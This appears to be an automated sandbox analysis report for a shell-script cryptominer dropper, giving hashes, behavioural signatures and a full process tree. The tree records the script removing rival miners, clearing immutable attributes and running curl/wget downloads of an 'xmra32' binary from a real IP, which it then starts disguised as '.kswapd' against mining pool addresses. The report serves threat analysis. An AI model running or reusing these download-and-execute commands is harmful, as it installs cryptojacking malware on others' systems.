Analysis
-
max time kernel
149s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
.kswapd.kswapdioc pid process /.cache/.kswapd 906 .kswapd /.cache/.kswapd 1103 .kswapd -
Attempts to change immutable files 37 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepchattrgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgreppid process 838 grep 849 grep 877 grep 1024 grep 1036 grep 1044 grep 1079 grep 826 grep 1064 grep 1072 grep 857 grep 861 grep 1052 grep 1068 grep 830 grep 822 grep 842 grep 814 grep 975 chattr 1056 grep 768 chattr 890 grep 1016 grep 1032 grep 1060 grep 1086 grep 818 grep 865 grep 869 grep 873 grep 1028 grep 1048 grep 834 grep 853 grep 1020 grep 1040 grep 810 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /usr/local/bin/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Reads CPU attributes 1 TTPs 6 IoCs
Processes:
pspspspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspspspsdescription ioc process File opened for reading /proc/371/cmdline ps File opened for reading /proc/388/stat ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/16/cmdline ps File opened for reading /proc/37/stat ps File opened for reading /proc/4/stat ps File opened for reading /proc/487/cmdline ps File opened for reading /proc/755/cmdline ps File opened for reading /proc/765/cmdline ps File opened for reading /proc/980/cmdline ps File opened for reading /proc/111/cmdline ps File opened for reading /proc/15/stat ps File opened for reading /proc/23/stat ps File opened for reading /proc/699/status ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/486/status ps File opened for reading /proc/meminfo ps File opened for reading /proc/12/status ps File opened for reading /proc/694/stat ps File opened for reading /proc/228/cmdline ps File opened for reading /proc/320/stat ps File opened for reading /proc/372/cmdline ps File opened for reading /proc/101/status ps File opened for reading /proc/69/stat ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/22/stat ps File opened for reading /proc/17/cmdline ps File opened for reading /proc/326/stat ps File opened for reading /proc/978/cmdline ps File opened for reading /proc/988/cmdline ps File opened for reading /proc/72/stat ps File opened for reading /proc/80/cmdline ps File opened for reading /proc/766/status ps File opened for reading /proc/695/cmdline ps File opened for reading /proc/17/status ps File opened for reading /proc/75/status ps File opened for reading /proc/228/status ps File opened for reading /proc/988/status ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/371/status ps File opened for reading /proc/766/cmdline ps File opened for reading /proc/804/stat ps File opened for reading /proc/317/cmdline ps File opened for reading /proc/972/status ps File opened for reading /proc/788/cmdline ps File opened for reading /proc/450/stat ps File opened for reading /proc/uptime ps File opened for reading /proc/23/cmdline ps File opened for reading /proc/111/cmdline ps File opened for reading /proc/694/stat ps File opened for reading /proc/383/status ps File opened for reading /proc/21/status ps File opened for reading /proc/694/status ps File opened for reading /proc/17/status ps File opened for reading /proc/76/stat ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/11/status ps File opened for reading /proc/450/status ps File opened for reading /proc/76/stat ps File opened for reading /proc/37/cmdline ps File opened for reading /proc/762/cmdline ps File opened for reading /proc/317/status ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /dev/shm/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /tmp/.QJHGrsevi 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/bin/unameuname -a2⤵
-
/bin/rmrm --help2⤵
-
/bin/grepgrep " rm does not remove dir"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl --help2⤵
-
/usr/bin/wgetwget --version2⤵
-
/bin/grepgrep -i "wgetrc "2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/headhead /dev/urandom2⤵
-
/usr/bin/trtr -dc A-Za-z0-92⤵
-
/usr/bin/shufshuf -i 4-16 -n 12⤵
-
/usr/bin/headhead -c 92⤵
-
/bin/rmrm -f /tmp/.QJHGrsevi2⤵
-
/bin/rmrm -f /tmp/.QJHGrsevi2⤵
-
/bin/rmrm -f /usr/local/bin/.QJHGrsevi2⤵
-
/bin/rmrm -f /dev/shm/.QJHGrsevi2⤵
-
/bin/rmrm -f /.QJHGrsevi2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/headhead -n 12⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/319/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/320/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/326/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/328/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/371/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/372/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/383/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/388/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/450/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/457/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/690/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/690/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/693/cwd2⤵
-
/bin/catcat /proc/693/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/694/cwd2⤵
-
/bin/catcat /proc/694/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/695/cwd2⤵
-
/bin/catcat /proc/695/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/699/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/701/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/701/exe2⤵
- Attempts to change immutable files
-
/bin/rmrm -rf /usr/sbin/agent2⤵
-
/bin/readlinkreadlink /proc/766/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/766/exe2⤵
- Attempts to change immutable files
-
/bin/grepgrep x86_642⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/319/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/320/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/326/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/328/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/371/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/372/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/383/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/388/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/450/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/457/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/693/cwd2⤵
-
/bin/catcat /proc/693/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/694/cwd2⤵
-
/bin/catcat /proc/694/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/695/cwd2⤵
-
/bin/catcat /proc/695/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/883/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/883/exe2⤵
- Attempts to change immutable files
-
/bin/rmrm -rf /usr/sbin/agent "(deleted)"2⤵
-
/bin/readlinkreadlink /proc/971/cwd2⤵
-
/bin/catcat /proc/971/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kworker/0:02⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/973/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe2⤵
- Attempts to change immutable files
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.QJHGrseviFilesize
10B
MD5aa5057d980a3be15376cb6c92c04b9da
SHA12b9ebc4a8b48ec1759385e40899954be31faf4cd
SHA256808fde5dd676e54423bcb4f17bc072ddf2be2c1e060cfacaff6eadc72990227d
SHA512286010c0689512476409463521fe1a40d3d03522bffcbfa52aebda4e0d2125d56f4d89c98b55ee36942006b275a94cc2437a24769927fa8957bf96825bb95c5e